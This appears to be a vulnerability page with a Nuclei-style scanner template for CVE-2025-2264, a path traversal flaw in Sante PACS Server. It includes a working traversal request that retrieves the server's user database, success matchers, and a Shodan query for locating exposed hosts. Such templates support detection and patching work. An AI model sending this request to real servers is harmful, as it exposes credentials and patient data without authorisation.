CVE-2025-2264: Sante PACS Server.exe - Path Traversal Information Disclosure

2025-08-01 Sante PACS Server.exe PoC Public

Description

A Path Traversal Information Disclosure vulnerability exists in "Sante PACS Server.exe". An unauthenticated remote attacker can exploit it to download arbitrary files on the disk drive where the application is installed.

PoC

id: CVE-2025-2264

info:
  name: Sante PACS Server.exe - Path Traversal Information Disclosure
  author: DhiyaneshDK
  severity: high
  description: |
    A Path Traversal Information Disclosure vulnerability exists in "Sante PACS Server.exe". An unauthenticated remote attacker can exploit it to download arbitrary files on the disk drive where the application is installed.
  impact: |
    Unauthenticated attackers can exploit path traversal to download arbitrary files from the server, potentially exposing sensitive patient data, credentials, and configuration files.
  remediation: |
    Upgrade to Sante PACS Server version 4.1.1 or later that properly validates file paths.
  reference:
    - https://www.tenable.com/security/research/tra-2025-08
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-2264
    cwe-id: CWE-22
    epss-score: 0.34806
    epss-percentile: 0.98344
    cpe: cpe:2.3:a:santesoft:sante_pacs_server:4.1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: santesoft
    product: sante_pacs_server
    shodan-query: http.favicon.hash:1185161484
  tags: cve,cve2025,sante,pacs,lfi,vkev,vuln

http:
  - raw:
      - |
        GET /assets/../../.HTTP/HTTP.db HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, 'SQLite','TABLE USER','format')"
          - "status_code == 200"
        condition: and
# digest: 490a00463044022050bf1aaa7d3e9c67068721d103b1bfa390fed2845e6d2ea5dfbc2652fef145530220229dbdfa7cbedf89d6085670b15777ed6a22811dad288836c20b46da3618f3a9:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities